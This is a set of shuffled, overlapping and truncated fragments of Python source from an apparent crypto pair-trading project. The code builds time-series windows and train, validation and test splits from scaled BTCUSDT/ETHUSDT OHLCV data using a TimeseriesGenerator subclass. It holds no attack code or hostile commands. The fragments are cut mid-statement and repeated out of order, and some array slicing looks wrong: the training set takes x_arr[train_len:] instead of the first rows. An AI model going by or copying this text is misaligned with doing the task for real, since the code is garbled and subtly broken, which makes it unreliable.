"test_len:, :] y_Train_data = y_arr[train_len:, :] y_Val_data = y_arr[train_len + self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes",
"> end_index=%i` ' 'is disallowed, as no part of the sequence ' 'would",
"continue return x_data, y_data def save_dataset_arrays(self, path_filename): pass if __name__ == \"__main__\": \"\"\"",
"f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' y_temp = self.dataset.y_df.values.reshape(-1, 1) if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler",
") for x_data, y_data in gen: continue return x_data, y_data def save_dataset_arrays(self, path_filename):",
"create_close1_close2_trend(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = None else: msg",
"(self.start_index + self.batch_size * self.stride * index) rows = np.arange(i, min(i + self.batch_size",
"import os import sys import time import copy import pytz import numpy as",
"return self.dataset.train_gen def get_val_generator(self, x_Val_data, y_Val_data): self.dataset.val_gen = TSDataGenerator(data=x_Val_data, targets=y_Val_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride,",
"if __name__ == \"__main__\": \"\"\" Usage for DataLoad class ------------------------ pairs_symbol = None",
"pd from typing import Tuple from sklearn.preprocessing import StandardScaler from sklearn.preprocessing import MinMaxScaler",
"get_local_timezone_name(): if time.daylight: offset_hour = time.altzone / 3600 else: offset_hour = time.timezone /",
"self.dataset.features_df.iloc[df_rows - df_test_len:, :] return df_train_len, df_val_len, df_test_len def get_train_generator(self, x_Train_data, y_Train_data): self.dataset.train_gen",
"self.targets = targets self.length = length self.sampling_rate = sampling_rate self.stride = stride self.start_index",
"x_Train_data = x_arr[train_len:, :] x_Val_data = x_arr[train_len + self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes + val_len,",
"'Data length is {}'.format(len(data)) + ' while target length is {}'.format(len(targets))) if overlap",
"y_arr[train_len:, :] y_Val_data = y_arr[train_len + self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes + val_len, :] y_Test_data",
"object with data Returns: DSCreator (class): object \"\"\" self.features = DataFeatures(loader) self.dataset_profile =",
"pass def create_power_trend(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = None",
"min(i + self.batch_size * self.stride, self.end_index + 1), self.stride) samples = np.array([self.data[row -",
"from dataclasses import dataclass from analyze.dataload import DataLoad from datamodeling.datafeatures import DataFeatures, DSProfile",
"if test_len is None: x_Train_data = x_arr[train_len:, :] x_Val_data = x_arr[:train_len + self.dataset_profile.gap_timeframes,",
"\"\"\" y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def create_close1_close2_trend(self): if self.dataset_profile.scaler == \"robust\":",
"import DataFeatures, DSProfile __version__ = 0.0010 def get_local_timezone_name(): if time.daylight: offset_hour = time.altzone",
"as no part of the sequence ' 'would be left to be used",
"as pd from typing import Tuple from sklearn.preprocessing import StandardScaler from sklearn.preprocessing import",
"sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.train_gen def get_val_generator(self, x_Val_data, y_Val_data): self.dataset.val_gen =",
"import TimeseriesGenerator import matplotlib.pyplot as plt import seaborn as sns import tensorflow as",
"index): if self.shuffle: rows = np.random.randint( self.start_index, self.end_index + 1, size=self.batch_size) else: i",
"= (self.start_index + self.batch_size * self.stride * index) rows = np.arange(i, min(i +",
"DSProfile() self.features_df = None self.y_df = None self.x_Train = None self.y_Train = None",
"(symbols and timeframes). All data with chosen period loaded to memory Args: loader",
"(self.y_Train is not None): return self.x_Train, self.y_Train def get_val(self): if (self.x_Val is not",
"no part of the sequence ' 'would be left to be used as",
"is disallowed') if overlap > 0: start_index += overlap self.data = data self.targets",
"DataSet: def __init__(self): self.name: str = '' self.dataset_profile = DSProfile() self.features_df = None",
"is not None): return self.x_Val, self.y_Val def get_test(self): if (self.x_Test is not None)",
"self.prepare_datagens(x_arr, y_arr) return self.dataset def create_data_from_gen(self, x_arr, y_arr): gen = TSDataGenerator(data=x_arr, targets=y_arr, length=self.dataset_profile.tsg_window_length,",
"self.length = length self.sampling_rate = sampling_rate self.stride = stride self.start_index = start_index +",
"RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = RobustScaler().fit(y_temp) else: msg = \"Error: Unknown scaler preparation type\" sys.exit(msg)",
"rows]) # self.sample_shape = np.expand_dims(samples, axis=0).shape sample_shape = (samples.shape[-2], samples.shape[-1],) return sample_shape def",
"timeframes directories for loading (with pairs_symbols) time_intervals = ['15m'] -> Use timeframes from",
"x_Train_data, y_Train_data): self.dataset.train_gen = TSDataGenerator(data=x_Train_data, targets=y_Train_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return",
"elif self.dataset_profile.Y_data == \"close1-close2_power\": self.dataset.y_df = self.features.create_y_close1_close2_sub_power() self.create_close1_close2_power() return self.dataset elif self.dataset_profile.Y_data ==",
"import DataLoad from datamodeling.datafeatures import DataFeatures, DSProfile __version__ = 0.0010 def get_local_timezone_name(): if",
"length, sampling_rate=1, stride=1, start_index=0, overlap=0, end_index=None, shuffle=False, reverse=False, batch_size=128): super().__init__(data, targets, length, sampling_rate,",
"and (self.y_Train is not None): return self.x_Train, self.y_Train def get_val(self): if (self.x_Val is",
"None else: df_val_len = int(df_rows * self.dataset_profile.val_size) df_test_len = df_rows - (df_train_len +",
"= shuffle self.reverse = reverse self.batch_size = batch_size self.sample_shape = None if self.start_index",
"batch_size self.sample_shape = None if self.start_index > self.end_index: raise ValueError('`start_index+length=%i > end_index=%i` '",
"= None self.features_scaler = object self.targets_scaler = object self.train_gen = None self.val_gen =",
"self.y_Test class DSCreator: \"\"\" Class for dataset creation for dataset configuration we are",
"- (df_val_len + self.dataset_profile.gap_timeframes) self.dataset.val_df = self.dataset.features_df.iloc[ df_train_len + self.dataset_profile.gap_timeframes: df_val_len + df_train_len",
"data start_period = '2021-09-01 00:00:00' -> Use from this datetimeindex end_period = None",
"get_test_generator(self, x_Test_data, y_Test_data): self.dataset.test_gen = TSDataGenerator(data=x_Test_data, targets=y_Test_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, )",
"= None self.test_gen = None self.input_shape = None pass def get_train(self): if (self.x_Train",
"\"\"\" loaded_crypto_data = DataLoad(pairs_symbols=None, time_intervals=['15m'], source_directory=\"../source_root\", start_period='2021-11-01 00:00:00', end_period='2021-12-05 23:59:59', ) dataset_1_profile =",
"= x_arr[train_len + self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes + val_len, :] x_Test_data = x_arr[x_arr.shape[0] -",
"self.dataset.input_shape = x_Val_gen.sample_shape pass def create_dataset(self) -> DataSet: self.dataset.dataset_profile = DSProfile() self.dataset.features_df =",
"self.dataset.y_Test = self.create_data_from_gen(x_Test_data, y_Test_data) # x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data) \"\"\" Using generator 1",
"= ['15m'] -> Use timeframes from this list to load start_period = None",
"== \"close1-close2\": self.dataset.y_df = self.features.create_y_close1_close2_sub() elif self.dataset_profile.Y_data == \"close1-close2_trend\": self.dataset.y_df = self.features.create_y_close1_close2_sub_trend() self.create_close1_close2_trend()",
"historical data start_period = '2021-09-01 00:00:00' -> Use from this datetimeindex end_period =",
"stride, start_index, end_index, shuffle, reverse, batch_size) if len(data) != len(targets): raise ValueError('Data and",
"in gen: continue return x_data, y_data def save_dataset_arrays(self, path_filename): pass if __name__ ==",
"(self.x_Val is not None) and (self.y_Val is not None): return self.x_Val, self.y_Val def",
"axis=0).shape sample_shape = (samples.shape[-2], samples.shape[-1],) return sample_shape def __getitem__(self, index): if self.shuffle: rows",
"self.features_scaler = object self.targets_scaler = object self.train_gen = None self.val_gen = None self.test_gen",
"00:00:00', end_period='2021-12-05 23:59:59', ) dataset_1_profile = DSProfile() dsc = DSCreator(loaded_crypto_data, dataset_1_profile) dataset_1_cls =",
"__getitem__(self, index): if self.shuffle: rows = np.random.randint( self.start_index, self.end_index + 1, size=self.batch_size) else:",
"y_Test_data) # x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data) \"\"\" Using generator 1 time to have",
"self.features = DataFeatures(loader) self.dataset_profile = dataset_profile self.dataset = DataSet() def split_data_df(self): df_rows =",
"of historical data end_period = '2021-12-05 23:59:59' -> Use until this datetimeindex source_directory=\"../source_root\"",
"\"__main__\": \"\"\" Usage for DataLoad class ------------------------ pairs_symbol = None -> Use all",
"datetimeindex source_directory=\"../source_root\" -> Use this directory to search timeframes directory \"\"\" loaded_crypto_data =",
"+ self.dataset_profile.gap_timeframes + val_len, :] x_Test_data = x_arr[x_arr.shape[0] - test_len:, :] y_Train_data =",
"overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.val_gen def get_test_generator(self, x_Test_data, y_Test_data): self.dataset.test_gen = TSDataGenerator(data=x_Test_data, targets=y_Test_data, length=self.dataset_profile.tsg_window_length,",
"= targets self.length = length self.sampling_rate = sampling_rate self.stride = stride self.start_index =",
"= self.calc_shape() pass def calc_shape(self): index = 0 i = (self.start_index + self.batch_size",
"end_period = '2021-12-05 23:59:59' -> Use until this datetimeindex source_directory=\"../source_root\" -> Use this",
"self.dataset_profile.Y_data == \"power_trend\": weight = self.dataset.dataset_profile.power_trend self.dataset.y_df = self.features.create_power_trend(weight) self.create_power_trend() return self.dataset else:",
"self.dataset.train_gen def get_val_generator(self, x_Val_data, y_Val_data): self.dataset.val_gen = TSDataGenerator(data=x_Val_data, targets=y_Val_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index,",
"np.random.randint( self.start_index, self.end_index + 1, size=self.batch_size) else: i = (self.start_index + self.batch_size *",
"as current step.' % (self.start_index, self.end_index)) self.sample_shape = self.calc_shape() pass def calc_shape(self): index",
"sys.exit(msg) x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check \"\"\" y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass",
"to have solid data \"\"\" self.dataset.x_Test, self.dataset.y_Test = self.create_data_from_gen(x_Test_data, y_Test_data) # x_Test_gen =",
"Use only this pairs to load time_intervals = None -> Use all timeframes",
"loader (DataLoad): object with data Returns: DSCreator (class): object \"\"\" self.features = DataFeatures(loader)",
"shuffle self.reverse = reverse self.batch_size = batch_size self.sample_shape = None if self.start_index >",
"self.dataset.val_df = self.dataset.features_df.iloc[ df_train_len + self.dataset_profile.gap_timeframes: df_val_len + df_train_len + self.dataset_profile.gap_timeframes, :] self.dataset.test_df",
"TSDataGenerator(TimeseriesGenerator): def __init__(self, data, targets, length, sampling_rate=1, stride=1, start_index=0, overlap=0, end_index=None, shuffle=False, reverse=False,",
"while target length is {}'.format(len(targets))) if overlap >= length: raise ValueError(f'`overlap={overlap} >= length={length}`",
"in rows]) if self.reverse: return samples[:, ::-1, ...], targets return samples, targets @dataclass",
"self.features.collect_features(self.dataset_profile) self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' if self.dataset_profile.Y_data == \"close1-close2\": self.dataset.y_df = self.features.create_y_close1_close2_sub() elif self.dataset_profile.Y_data",
"if overlap >= length: raise ValueError(f'`overlap={overlap} >= length={length}` is disallowed') if overlap >",
"= overlap if end_index is None: end_index = len(data) - 1 self.end_index =",
":] y_Train_data = y_arr[train_len:, :] y_Val_data = y_arr[train_len + self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes +",
"y_Train_data = y_arr[train_len:, :] y_Val_data = y_arr[train_len + self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes + val_len,",
"None): return self.x_Test, self.y_Test class DSCreator: \"\"\" Class for dataset creation for dataset",
"self.dataset.dataset_profile.power_trend self.dataset.y_df = self.features.create_power_trend(weight) self.create_power_trend() return self.dataset else: msg = \"Error: Unknown dataset",
"= f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' if self.dataset_profile.Y_data == \"close1-close2\": self.dataset.y_df = self.features.create_y_close1_close2_sub() elif self.dataset_profile.Y_data == \"close1-close2_trend\":",
"y_arr = self.dataset.targets_scaler.transform(y_temp) self.prepare_datagens(x_arr, y_arr) return self.dataset def create_data_from_gen(self, x_arr, y_arr): gen =",
"= self.create_data_from_gen(x_Test_data, y_Test_data) # x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data) \"\"\" Using generator 1 time",
"historical data end_period = '2021-12-05 23:59:59' -> Use until this datetimeindex source_directory=\"../source_root\" ->",
"length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.test_gen def create_close1_close2_power(self): if self.dataset_profile.scaler ==",
"in timeframe directory pairs_symbol = (\"BTCUSDT\", \"ETHUSDT\") -> Use only this pairs to",
"-> Use until [:-1] of historical data end_period = '2021-12-05 23:59:59' -> Use",
"stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.val_gen def get_test_generator(self, x_Test_data, y_Test_data): self.dataset.test_gen = TSDataGenerator(data=x_Test_data,",
"\"\"\" y_arr = self.dataset.targets_scaler.transform(y_temp) self.prepare_datagens(x_arr, y_arr) return self.dataset def create_data_from_gen(self, x_arr, y_arr): gen",
"= DSProfile() self.features_df = None self.y_df = None self.x_Train = None self.y_Train =",
"<reponame>AI-Traiding-Team/paired_trading import os import sys import time import copy import pytz import numpy",
"length is {}'.format(len(targets))) if overlap >= length: raise ValueError(f'`overlap={overlap} >= length={length}` is disallowed')",
"self.length:row:self.sampling_rate] for row in rows]) # self.sample_shape = np.expand_dims(samples, axis=0).shape sample_shape = (samples.shape[-2],",
"def prepare_datagens(self, x_arr, y_arr): train_len, val_len, test_len = self.split_data_df() if test_len is None:",
"self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' if self.dataset_profile.Y_data == \"close1-close2\": self.dataset.y_df = self.features.create_y_close1_close2_sub() elif self.dataset_profile.Y_data ==",
"object \"\"\" self.features = DataFeatures(loader) self.dataset_profile = dataset_profile self.dataset = DataSet() def split_data_df(self):",
"...], targets return samples, targets @dataclass class DataSet: def __init__(self): self.name: str =",
"+ self.dataset_profile.gap_timeframes, :] else: x_Train_data = x_arr[train_len:, :] x_Val_data = x_arr[train_len + self.dataset_profile.gap_timeframes:train_len",
"@dataclass class DataSet: def __init__(self): self.name: str = '' self.dataset_profile = DSProfile() self.features_df",
"x_arr[train_len + self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes + val_len, :] x_Test_data = x_arr[x_arr.shape[0] - test_len:,",
"self.dataset.x_Test, self.dataset.y_Test = self.create_data_from_gen(x_Test_data, y_Test_data) # x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data) \"\"\" Using generator",
"as sns import tensorflow as tf from dataclasses import dataclass from analyze.dataload import",
"timeframe directory pairs_symbol = (\"BTCUSDT\", \"ETHUSDT\") -> Use only this pairs to load",
"for dataset configuration we are using DSConstants dataclass (profile) \"\"\" def __init__(self, loader:",
"overlap=self.dataset_profile.tsg_overlap, batch_size=x_arr.shape[0] ) for x_data, y_data in gen: continue return x_data, y_data def",
"' 'Data length is {}'.format(len(data)) + ' while target length is {}'.format(len(targets))) if",
"\"\"\" check \"\"\" y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def prepare_datagens(self, x_arr, y_arr):",
"y_Train_data) x_Val_gen = self.get_val_generator(x_Val_data, y_Val_data) self.dataset.x_Train, self.dataset.y_Train = self.create_data_from_gen(x_Train_data, y_Train_data) self.dataset.x_Val, self.dataset.y_Val =",
"y_Val_data) self.dataset.input_shape = x_Val_gen.sample_shape pass def create_dataset(self) -> DataSet: self.dataset.dataset_profile = DSProfile() self.dataset.features_df",
"def get_train_generator(self, x_Train_data, y_Train_data): self.dataset.train_gen = TSDataGenerator(data=x_Train_data, targets=y_Train_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap,",
"self.dataset def create_data_from_gen(self, x_arr, y_arr): gen = TSDataGenerator(data=x_arr, targets=y_arr, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index,",
"loader: DataLoad, dataset_profile: DSProfile): \"\"\" Getting object with OHLCV data (symbols and timeframes).",
"= dataset_profile self.dataset = DataSet() def split_data_df(self): df_rows = self.dataset.features_df.shape[0] df_train_len = int(df_rows",
"datetimeindex end_period = None -> Use until [:-1] of historical data end_period =",
"= 0.0010 def get_local_timezone_name(): if time.daylight: offset_hour = time.altzone / 3600 else: offset_hour",
"and (self.y_Val is not None): return self.x_Val, self.y_Val def get_test(self): if (self.x_Test is",
"if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = None else: msg =",
"same length. ' 'Data length is {}'.format(len(data)) + ' while target length is",
"1), self.stride) samples = np.array([self.data[row - self.overlap - self.length:row:self.sampling_rate] for row in rows])",
"return self.x_Train, self.y_Train def get_val(self): if (self.x_Val is not None) and (self.y_Val is",
"DataLoad(pairs_symbols=None, time_intervals=['15m'], source_directory=\"../source_root\", start_period='2021-11-01 00:00:00', end_period='2021-12-05 23:59:59', ) dataset_1_profile = DSProfile() dsc =",
"are using DSConstants dataclass (profile) \"\"\" def __init__(self, loader: DataLoad, dataset_profile: DSProfile): \"\"\"",
"return self.dataset elif self.dataset_profile.Y_data == \"close1-close2_power\": self.dataset.y_df = self.features.create_y_close1_close2_sub_power() self.create_close1_close2_power() return self.dataset elif",
"return df_train_len, df_val_len, df_test_len def get_train_generator(self, x_Train_data, y_Train_data): self.dataset.train_gen = TSDataGenerator(data=x_Train_data, targets=y_Train_data, length=self.dataset_profile.tsg_window_length,",
"RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = None else: msg = \"Error: Unknown scaler preparation type\" sys.exit(msg)",
"self.dataset.train_gen = TSDataGenerator(data=x_Train_data, targets=y_Train_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.train_gen def",
"f\"+{offset_hour:.0f}\" return f'Etc/GMT{offset_hour_msg}' class TSDataGenerator(TimeseriesGenerator): def __init__(self, data, targets, length, sampling_rate=1, stride=1, start_index=0,",
"self.dataset.y_Train = self.create_data_from_gen(x_Train_data, y_Train_data) self.dataset.x_Val, self.dataset.y_Val = self.create_data_from_gen(x_Val_data, y_Val_data) self.dataset.input_shape = x_Val_gen.sample_shape pass",
"if self.shuffle: rows = np.random.randint( self.start_index, self.end_index + 1, size=self.batch_size) else: i =",
"be used as current step.' % (self.start_index, self.end_index)) self.sample_shape = self.calc_shape() pass def",
"gen = TSDataGenerator(data=x_arr, targets=y_arr, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, batch_size=x_arr.shape[0] ) for x_data,",
"return self.dataset def create_data_from_gen(self, x_arr, y_arr): gen = TSDataGenerator(data=x_arr, targets=y_arr, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride,",
"only this pairs to load time_intervals = None -> Use all timeframes directories",
"def create_power_trend(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = None else:",
"= RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = RobustScaler().fit(y_temp) else: msg = \"Error: Unknown scaler preparation type\"",
"self.dataset = DataSet() def split_data_df(self): df_rows = self.dataset.features_df.shape[0] df_train_len = int(df_rows * self.dataset_profile.train_size)",
"pairs in timeframe directory pairs_symbol = (\"BTCUSDT\", \"ETHUSDT\") -> Use only this pairs",
"= time.timezone / 3600 offset_hour_msg = f\"{offset_hour:.0f}\" if offset_hour > 0: offset_hour_msg =",
"start_index + length self.overlap = overlap if end_index is None: end_index = len(data)",
"self.train_gen = None self.val_gen = None self.test_gen = None self.input_shape = None pass",
"self.dataset elif self.dataset_profile.Y_data == \"power_trend\": weight = self.dataset.dataset_profile.power_trend self.dataset.y_df = self.features.create_power_trend(weight) self.create_power_trend() return",
"df_rows - (df_train_len + self.dataset_profile.gap_timeframes) self.dataset.train_df = self.dataset.features_df.iloc[:df_train_len, :] if self.dataset_profile.train_size + self.dataset_profile.val_size",
"start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.val_gen def get_test_generator(self, x_Test_data, y_Test_data): self.dataset.test_gen = TSDataGenerator(data=x_Test_data, targets=y_Test_data,",
"'' self.dataset_profile = DSProfile() self.features_df = None self.y_df = None self.x_Train = None",
"y_Val_data) self.dataset.x_Train, self.dataset.y_Train = self.create_data_from_gen(x_Train_data, y_Train_data) self.dataset.x_Val, self.dataset.y_Val = self.create_data_from_gen(x_Val_data, y_Val_data) self.dataset.input_shape =",
"start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, batch_size=x_arr.shape[0] ) for x_data, y_data in gen: continue return x_data, y_data",
"y_data def save_dataset_arrays(self, path_filename): pass if __name__ == \"__main__\": \"\"\" Usage for DataLoad",
"prepare_datagens(self, x_arr, y_arr): train_len, val_len, test_len = self.split_data_df() if test_len is None: x_Train_data",
"= data self.targets = targets self.length = length self.sampling_rate = sampling_rate self.stride =",
"= None self.val_gen = None self.test_gen = None self.input_shape = None pass def",
"rows = np.arange(i, min(i + self.batch_size * self.stride, self.end_index + 1), self.stride) samples",
"None self.x_Test = None self.y_Test = None self.features_scaler = object self.targets_scaler = object",
"x_Val_gen = self.get_val_generator(x_Val_data, y_Val_data) self.dataset.x_Train, self.dataset.y_Train = self.create_data_from_gen(x_Train_data, y_Train_data) self.dataset.x_Val, self.dataset.y_Val = self.create_data_from_gen(x_Val_data,",
"return samples, targets @dataclass class DataSet: def __init__(self): self.name: str = '' self.dataset_profile",
"stride self.start_index = start_index + length self.overlap = overlap if end_index is None:",
"\"\"\" def __init__(self, loader: DataLoad, dataset_profile: DSProfile): \"\"\" Getting object with OHLCV data",
"def __init__(self, loader: DataLoad, dataset_profile: DSProfile): \"\"\" Getting object with OHLCV data (symbols",
"'2021-12-05 23:59:59' -> Use until this datetimeindex source_directory=\"../source_root\" -> Use this directory to",
"x_data, y_data def save_dataset_arrays(self, path_filename): pass if __name__ == \"__main__\": \"\"\" Usage for",
"df_rows - (df_train_len + self.dataset_profile.gap_timeframes) - (df_val_len + self.dataset_profile.gap_timeframes) self.dataset.val_df = self.dataset.features_df.iloc[ df_train_len",
"(df_val_len + self.dataset_profile.gap_timeframes) self.dataset.val_df = self.dataset.features_df.iloc[ df_train_len + self.dataset_profile.gap_timeframes: df_val_len + df_train_len +",
"None: end_index = len(data) - 1 self.end_index = end_index self.shuffle = shuffle self.reverse",
"self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def create_close1_close2_trend(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values)",
"+ ' while target length is {}'.format(len(targets))) if overlap >= length: raise ValueError(f'`overlap={overlap}",
"self.dataset.targets_scaler.transform(y_temp) self.prepare_datagens(x_arr, y_arr) return self.dataset def create_data_from_gen(self, x_arr, y_arr): gen = TSDataGenerator(data=x_arr, targets=y_arr,",
"pandas as pd from typing import Tuple from sklearn.preprocessing import StandardScaler from sklearn.preprocessing",
"length. ' 'Data length is {}'.format(len(data)) + ' while target length is {}'.format(len(targets)))",
"return df_train_len, df_val_len, None else: df_val_len = int(df_rows * self.dataset_profile.val_size) df_test_len = df_rows",
"= x_arr[train_len:, :] x_Val_data = x_arr[train_len + self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes + val_len, :]",
"self.get_test_generator(x_Test_data, y_Test_data) \"\"\" Using generator 1 time to have solid data \"\"\" x_Train_gen",
"scaler preparation type\" sys.exit(msg) x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check \"\"\" y_arr = self.dataset.targets_scaler.transform(y_temp)",
"= None -> Use all timeframes directories for loading (with pairs_symbols) time_intervals =",
"offset_hour = time.timezone / 3600 offset_hour_msg = f\"{offset_hour:.0f}\" if offset_hour > 0: offset_hour_msg",
"i = (self.start_index + self.batch_size * self.stride * index) rows = np.arange(i, min(i",
"to have solid data \"\"\" x_Train_gen = self.get_train_generator(x_Train_data, y_Train_data) x_Val_gen = self.get_val_generator(x_Val_data, y_Val_data)",
"overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.test_gen def create_close1_close2_power(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values)",
"= y_arr[train_len + self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes + val_len, :] y_Test_data = y_arr[x_arr.shape[0] -",
">= length={length}` is disallowed') if overlap > 0: start_index += overlap self.data =",
"return self.x_Val, self.y_Val def get_test(self): if (self.x_Test is not None) and (self.y_Test is",
"\"\"\" check \"\"\" y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def create_power_trend(self): if self.dataset_profile.scaler",
"y_arr): train_len, val_len, test_len = self.split_data_df() if test_len is None: x_Train_data = x_arr[train_len:,",
"= y_arr[train_len:, :] y_Val_data = y_arr[train_len + self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes + val_len, :]",
"= self.dataset.features_df.iloc[:df_train_len, :] if self.dataset_profile.train_size + self.dataset_profile.val_size == 1.0: self.dataset.val_df = self.dataset.features_df.iloc[df_train_len +",
"and timeframes). All data with chosen period loaded to memory Args: loader (DataLoad):",
"self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check \"\"\" y_arr = self.dataset.targets_scaler.transform(y_temp) self.prepare_datagens(x_arr, y_arr) return self.dataset def create_data_from_gen(self,",
"None -> Use from [0:] of historical data start_period = '2021-09-01 00:00:00' ->",
"== \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = None else: msg = \"Error: Unknown",
"(self.start_index, self.end_index)) self.sample_shape = self.calc_shape() pass def calc_shape(self): index = 0 i =",
"Getting object with OHLCV data (symbols and timeframes). All data with chosen period",
"+ self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes + val_len, :] y_Test_data = y_arr[x_arr.shape[0] - test_len:, :]",
"overlap if end_index is None: end_index = len(data) - 1 self.end_index = end_index",
"have solid data \"\"\" x_Train_gen = self.get_train_generator(x_Train_data, y_Train_data) x_Val_gen = self.get_val_generator(x_Val_data, y_Val_data) self.dataset.x_Train,",
"= DataLoad(pairs_symbols=None, time_intervals=['15m'], source_directory=\"../source_root\", start_period='2021-11-01 00:00:00', end_period='2021-12-05 23:59:59', ) dataset_1_profile = DSProfile() dsc",
"= DataSet() def split_data_df(self): df_rows = self.dataset.features_df.shape[0] df_train_len = int(df_rows * self.dataset_profile.train_size) df_val_len",
":] return df_train_len, df_val_len, df_test_len def get_train_generator(self, x_Train_data, y_Train_data): self.dataset.train_gen = TSDataGenerator(data=x_Train_data, targets=y_Train_data,",
"= \"Error: Unknown scaler preparation type\" sys.exit(msg) x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check \"\"\"",
"self.dataset.y_df = self.features.create_y_close1_close2_sub_power() self.create_close1_close2_power() return self.dataset elif self.dataset_profile.Y_data == \"power_trend\": weight = self.dataset.dataset_profile.power_trend",
"elif self.dataset_profile.Y_data == \"power_trend\": weight = self.dataset.dataset_profile.power_trend self.dataset.y_df = self.features.create_power_trend(weight) self.create_power_trend() return self.dataset",
"all pairs in timeframe directory pairs_symbol = (\"BTCUSDT\", \"ETHUSDT\") -> Use only this",
"1 time to have solid data \"\"\" x_Train_gen = self.get_train_generator(x_Train_data, y_Train_data) x_Val_gen =",
"None -> Use until [:-1] of historical data end_period = '2021-12-05 23:59:59' ->",
"3600 else: offset_hour = time.timezone / 3600 offset_hour_msg = f\"{offset_hour:.0f}\" if offset_hour >",
"with OHLCV data (symbols and timeframes). All data with chosen period loaded to",
